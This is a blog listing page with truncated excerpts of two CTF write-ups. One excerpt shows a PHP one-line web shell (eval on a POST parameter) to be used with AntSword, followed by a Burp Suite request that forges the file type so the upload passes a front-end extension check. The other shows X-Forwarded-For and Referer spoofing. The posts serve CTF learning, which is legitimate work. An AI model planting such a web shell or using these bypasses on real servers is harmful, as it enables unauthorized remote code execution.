摘要: //AntSword连接木马 <?php eval($_POST['password']); ?> //Burp Suite抓包伪造文件类型绕过前端后缀名检测 POST / HTTP/1.1 Host: challenge-39ad69aaaf5a677e.sandbox.ctfhub.com:10 阅读全文
posted @ 2022-07-19 16:27 Tony_Double_Sky 阅读(39) 评论(0) 推荐(0) 编辑
摘要: 在burp suite中利用X-Forwarded-For和referer字段伪造ip与来源 GET / HTTP/1.1 Host: 61.147.171.105:58178 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Ag 阅读全文
posted @ 2022-07-19 15:00 Tony_Double_Sky 阅读(173) 评论(0) 推荐(0) 编辑